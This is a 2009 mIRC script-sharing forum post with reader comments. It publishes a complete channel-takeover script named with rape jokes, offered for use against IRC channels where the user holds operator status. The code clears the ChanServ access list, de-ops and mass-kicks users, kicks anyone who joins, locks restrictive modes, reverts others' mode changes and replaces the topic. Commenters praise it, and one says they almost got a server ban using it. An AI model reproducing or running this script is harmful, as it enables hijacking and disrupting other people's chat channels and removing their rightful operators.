room rape

By Şąŧąŋ on Aug 08, 2009

ok its a cheap takeover script that i made one day because was bored (also n00b style) but i like it and it works great.
simply paste it into remotes and right click on a channel (op status needed) and select Satans Wrath and click enable
it will do the following

  • set modes +miRQVMlsSk
  • lock modes in a channel so they cannot be unset
  • de-op all users under and equal to you
  • mass kick (automaticly unset mode +q then reset after mass kick)
  • kick on entry
  • change the topic to something mean and stupid
    to disable just go to Satans Wrath and select disable
    notice: this is not a wIRC script, this is one of a kind
    enjoy
menu channel {
  .[Satans wrath]
  ..Enable Satans wrath: .enable #room-rape | echo Satans wrath has begun, standby for Pwnage... | /rape
  ..Disable Satans wrath: .disable #room-rape | echo Satans wrath is over, Pwnage Complete. | /defuck
}
#room-rape off
on *:JOIN:#: { kick # $nick FEEL THE WRATH OF SATAN THE GOD OF ALL EVIL }
on *:RAWMODE:#:{
  if ( !$istok($me ,$nick,32) ) {    
    if (+ isin $1) {
      if (q isin $1) { mode $chan -q $2 }
      if (a isin $1) { mode $chan -a $2 }
      if (o isin $1) { mode $chan -o $2 }
      if (h isin $1) { mode $chan -h $2 }
      if (v isin $1) { mode $chan -v $2 }
    }
    if (- isin $1) {
      if (o isin $1) { mode $chan +o $2 }
    }
  }
}
on *:MODE:#: { if ( !$istok($me ,$nick,32) ) {  
    mode $chan $replacex($1-,+,-,-,+)  
  }
}
alias rape {
  /roomfuck
  /roomrape
}
alias pwnage {
  echo $me Hello, $me $+ , here is your list of Pwnage Options...
  echo $me /rape, will be all that you need, hehe...
  echo $me All you gotta do, is type /rape in the channel you wanna fuck with temp ops or higher...
}
alias roomrape {
  mode # +RMimVlkSs 2 ToTaL-LoCkDoWn
}
alias roomfuck {
  .timer 1 0 cs set # xop off
  .timer 1 0 cs access # clear
  .timer 1 0 bs set # dontkickops ON
  .timer 1 1 mode # +e $me
  .timer 1 1 mkick
  .timer 1 1 mode # +iK
}
alias mkick {
  set %mkickmark 1
  :mkicktop
  if ($nick(#,%mkickmark) == $null) {
    if ($nick(#,%mkickmark) != $me) { goto mkickend }
    if ($1 != $null) { kick # $nick(#,%mkickmark) $1 Y0U JU57 G07 0WN3D!!! }
    else { cs kick # $nick(#,%mkickmark) YOU JUST GOT 0WN3D!!! }
  }
  inc %mkickmark
  goto mkicktop
  :mkickend
  unset %mkickmark
}
#room-rape end
alias defuck {
  mode # -miRQVMlsSk 2 ToTaL-LoCkDoWn
}

Comments

Sign in to comment.
Şąŧąŋ   -  Aug 09, 2009

lmao glad you like it, throughout all the time ive been on hawkee ive nvr seen a snippet for bad causes thats why i had to put it up lol

 Respond  
PATX   -  Aug 09, 2009

Quick LOLOLOL! Thats too good!!!

 Respond  
Quick   -  Aug 09, 2009

Lmfao, Satan you sicko. I almost got a server ban on this one :\ xD nice work tho, I love it

 Respond  
PATX   -  Aug 08, 2009

at first i thought this was going to be a totally perverted script but it was really pretty good.

 Respond  
Şąŧąŋ   -  Aug 08, 2009

lol i wonder what a passing person would think about a script named "room rape"

 Respond  
Jonesy44   -  Aug 08, 2009

alias rape {
/roomfuck
/roomrape
}

lol.

 Respond  
Şąŧąŋ   -  Aug 08, 2009

lol well thats what its called @__@

 Respond  
Jethro   -  Aug 08, 2009

I think the title could have been named Room raid instead of Room rape

 Respond  
Jethro   -  Aug 08, 2009

The title of this script is an attention seeker, and it certainly got me.

 Respond  
Are you sure you want to unfollow this person?
Are you sure you want to delete this?
Click "Unsubscribe" to stop receiving notices pertaining to this post.
Click "Subscribe" to resume notices pertaining to this post.